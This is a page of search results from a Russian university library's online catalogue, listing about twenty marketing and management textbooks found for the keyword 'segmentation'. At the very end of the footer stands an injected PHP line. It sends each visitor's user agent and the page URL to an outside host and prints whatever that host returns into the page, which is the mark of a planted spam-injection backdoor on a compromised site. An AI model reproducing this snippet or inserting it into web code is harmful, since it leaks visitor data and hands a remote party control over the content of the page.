Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

129 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=СЕГМЕНТАЦИЯ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 245
1. 
Ноздрева Р. Б. Маркетинг [Текст] : Учеб., практикум и учеб.-метод. комплекс по маркетингу для вузов по экон. специальностям и направлениям / Р. Б. Ноздрева, В. Ю. Гречков, Г. Д. Крылова, М. И. Соколова, 2000. - 566 с.
Оглавление 
  • Крылова, Г. Д. Практикум по маркетингу / Г. Д. Крылова, М. И. Соколова
  • Ноздрева, Р. Б. Учебно-методический комплекс по маркетингу / Р. Б. Ноздрева, Г. Д. Крылова, М. И. Соколова
2. 
Федько, Валерий Павлович. Основы маркетинга [Текст] : 100 экзаменац. ответов / В. П. Федько, Н. Г. Федько, 2000. - 444 с.
Ключевые слова 
Маркетинг -- Маркетинговое исследование -- Рынок -- Сегментация рынка -- Позиционирование -- Рыночная ниша -- конъюнктура рынка -- Товар -- Фирма -- Компенсация -- Полезность -- Товарная политика -- Ассортимент -- Покупатель -- Спрос -- Упаковка -- Маркировка -- Товарный знак -- Штриховой код -- Стратегия -- Конкуренция -- Франчайзинг -- Сбыт -- Биржа -- Аукцион -- Бизнес-план -- Коммуникация -- Репутация -- Паблик рилейшнз -- Ценообразование -- Реклама -- Имидж -- Цена -- Контроллинг -- Бюджет -- Этикет -- Сделка внешнеторговая -- КОММУНИКАЦИЯ МАРКЕТИНГОВАЯ -- паблик рилейшнз -- РЕКЛАМА - МАРКЕТИНГ -- МАРКЕТИНГ МЕЖДУНАРОДНЫЙ -- Имидж фирмы -- СТИЛЬ ФИРМЕННЫЙ -- ПОЛИТИКА ЦЕНОВАЯ -- ЦЕНООБРАЗОВАНИЕ - маркетинг -- СЛУЖБА МАРКЕТИНГА -- КОНТРОЛЛИНГ -- БЮДЖЕТ МАРКЕТИНГА
3. 
Фатхутдинов, Раис Ахметович. Организация производства [Текст] : Учеб. для вузов по экон. и упр. специальностям / Р. А. Фатхутдинов, 2001. - 671 с.
Держатели документа (Информация об экземплярах) 
4. 
Модульная программа для менеджеров [Текст] : В 17 кн. / Университет упр.(Москва). Кн. 13 : Управление маркетингом / Б. А. Соловьев, 2000. - 266 с.
5. 
Батра, Раджив. Рекламный менеджмент [Текст] : Пер. с англ. / Р. Батра, Д. Д. Майерс, Д. А. Аакер, 2001. - 780 с.
Держатели документа (Информация об экземплярах) 
6. 
Терещенко, Владимир Михайлович. Маркетинг: новые технологии в России [Текст] / В. М. Терещенко, 2001. - 415 с.
7. 
Менеджмент [Текст] : Для студентов вузов / Т. Ю. Анопченко, Е. А. Ахмедова, Г. А. Болошин и др.; Под ред. И. Ю. Солдатовой, М. А. Чернышева, 2002. - 379 с.
Ключевые слова 
МЕНЕДЖЕР -- УПРАВЛЕНИЕ -- СТРАТЕГИЧЕСКИЙ МЕНЕДЖМЕНТ -- ИНВЕСТИЦИОННЫЙ МЕНЕДЖМЕНТ -- КОРПОРАТИВНОЕ УПРАВЛЕНИЕ -- МАРКЕТИНГ -- ЦЕНООБРАЗОВАНИЕ -- ЛОГИСТИКА -- ИНФОРМАЦИОННЫЙ БИЗНЕС -- ИНФОРМАЦИЯ -- СЕГМЕНТАЦИЯ РЫНКА -- ПОЛИТИКА ТОВАРНАЯ -- ЦИКЛ ЖИЗНЕННЫЙ ТОВАРА -- ЦЕНООБРАЗОВАНИЕ -- ИССЛЕДОВАНИЕ МАРКЕТИНГОВОЕ -- СИСТЕМА УПРАВЛЕНИЯ - исследование -- ЛОГИСТИКА -- ИНФОРМАЦИЯ -- ТЕХНОЛОГИЯ ИНФОРМАЦИОННАЯ -- СИСТЕМА ИНФОРМАЦИОННАЯ -- ИНТЕРНЕТ - Менеджмент -- МЕНЕДЖМЕНТ - автоматизация -- ТРУД УПРАВЛЕНЧЕСКИЙ -- МЕНЕДЖЕР -- SWOT - анализ

Учебное пособие содержит ответы на экзаменационные вопросы базовых дисциплин специальности "Менеджмент организации" в соответствии с новым государственым образовательным стандартом. Позволяет студентам вузов, слушателям программ дополнительного профессионального образования в предельно короткие сроки систематизировать, конкретизировать знания, приобретенные в процессе изучения соответствующих дисциплин, усвоить структуру ответа на возможные экзаменационные вопросы.

8. 
Маркетинг [Электронный ресурс] : Электрон. учеб. пособие / Нижегор. ин-т менеджмента и бизнеса, 2001. - 1 o=эл. опт. диск (CD-R)
Держатели документа (Информация об экземплярах) 
9. 
Международный маркетинг [Текст] : учеб. пособие для студентов, обучающихся по экон. специальностям и направлениям / Н. И. Перцовский, И. А. Спиридонов, С. В. Барсукова; Под ред. Н. И. Перцовского, 2001. - 238, [1] с.
10. 
Котлер, Филип. Маркетинг. Менеджмент [Текст] : Анализ, планирование, внедрение, контроль / Ф. Котлер; М. Бугаев, О. А. Третьяк, 2000. - 887 с.
11. 
Басовский, Леонид Ефимович. Маркетинг [Текст] : Курс лекций / Л. Е. Басовский, 2000. - 218 с.
Ключевые слова 
Маркетинг -- Учебник и пособие -- Маркетинговая деятельность -- Маркетинговая среда -- Покупатель -- Потребитель -- Покупка -- Рынок -- Маркетинговое исследование -- Сегментация рынка -- Товар -- Товарная марка -- Упаковка -- Услуга -- Ценообразование -- Товародвижение -- Розничная торговля -- Оптовая торговля -- Маркетинговая коммуникация -- Реклама -- Стимулирование -- Пропаганда -- Стратегическое управление -- Международный маркетинг -- Некоммерческий маркетинг
Держатели документа (Информация об экземплярах) 
12. 
Маркетинг [Текст] : Учеб. / Э. А. Уткин, А. И. Кочеткова, Л. И. Юликов, 1999. - 319 с.
13. 
Разроев, Элдар. Маркетинг сотовой связи [Текст] / А. Разроев, 1999. - 160 с.
Ключевые слова 
Сотовая связь -- Маркетинг -- Конкуренция -- Телекоммуникационный рынок -- Прогнозирование -- Инвестиционный ресурс -- Бизнес -- Планирование -- Маркетинговое исследование -- Сотовая сеть -- Спрос -- Сегментация -- Позиционирование -- Ценообразование -- Цена -- Коммуникация -- Реклама -- Связь с общественностью -- Продажа -- Абонент -- Абонентское обслуживание -- Инфраструктурный резерв -- Сотовая технология -- Абонент -- Абонентское -- обслуживание -- Инфраструктурный -- резерв -- Сотовая
Держатели документа (Информация об экземплярах) 
14. 
Батра, Раджив. Рекламный менеджмент [Текст] : Пер. с англ. / Р. Батра, Д. Дж. Майерс, Д. А. Аакер, 1999. - 780 с.
15. 
Циферблат, Лазарь Файвелевич. Бизнес-план [Текст] : Работа над ошибками / Л. Ф. Циферблат, 1999. - 140 с.
16. 
Крылов, Игорь Викторович. Маркетинг [Текст] : (Социология маркетинговых коммуникаций); Учеб. пособие / И. В. Крылов, 1998. - 189 с.
Держатели документа (Информация об экземплярах) 
17. 
Басовский, Леонид Ефимович. Маркетинг [Текст] : Курс лекций / Л. Е. Басовский, 1999. - 218 с.
Ключевые слова 
Маркетинг -- Учебник и пособие -- Курс лекций -- Маркетинговая деятельность -- Покупатель -- Покупка -- Маркетинговое исследование -- Сегментация рынка -- Товарная марка -- Товар -- Упаковка -- Услуга -- Ценообразование -- Товародвижение -- Розничная торговля -- Оптовая торговля -- Маркетинговая коммуникация -- Реклама -- Стимулирование сбыта -- Стратегическое управление -- Стратегическое планирование -- Маркетинг услуг -- Некоммерческий маркетинг
Держатели документа (Информация об экземплярах) 
18. 
Методические указания по выполнению курсового проекта по маркетингу [Текст] / ОмГТУ, 2000. - 24 с.
Держатели документа (Информация об экземплярах) 
Полный текст
19. 
Основы маркетинга [Текст] : Пер. с англ. / Ф. Котлер, Г. Армстронг, Д. Сондерс, В. Вонг; Н. В. Шульпина, 2000. - 943 с.
20. 
Маркетинг [Текст] : Учеб. для вузов, по специальностям "Маркетинг" и "Менеджмент" / А. Н. Романов, Ю. Ю. Корлюгов, С. А. Красильников, 1996. - 558 с.
Ключевые слова 
Маркетинг -- Рынок -- Товар -- Цена -- Ценообразование -- Ценовая политика -- Предприятие -- Спрос -- Сбыт -- Биржевая деятельность -- СЕГМЕНТАЦИЯ -- ИЗУЧЕНИЕ -- ПОТРЕБИТЕЛЕЙ -- ОБЕСПЕЧЕНИЕ -- КАЧЕСТВА -- КОНКУРЕНТОСПОСОБНОСТИ -- СЕРВИС -- РЕАЛИЗАЦИЯ -- КОММУНИКАЦИИ -- РЕКЛАМА -- паблик -- рилейшнз -- ЦЕНЫ -- ЦЕНООБРАЗОВАНИЕ -- КОНТРОЛЬ -- БИЗНЕС-ПЛАН ПРЕДПРИЯТИЯ -- МЕЖДУНАРОДНЫЙ МАРКЕТИНГ -- БИРЖЕВАЯ ДЕЯТЕЛЬНОСТЬ -- БАНКОВСКИЙ МАРКЕТИНГ -- ИНФОРМАЦИОННЫЕ ТЕХНОЛОГИИ В МАРКЕТИНГЕ


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3025 - 21.09.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.92 с.12 запросов, 0.44c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;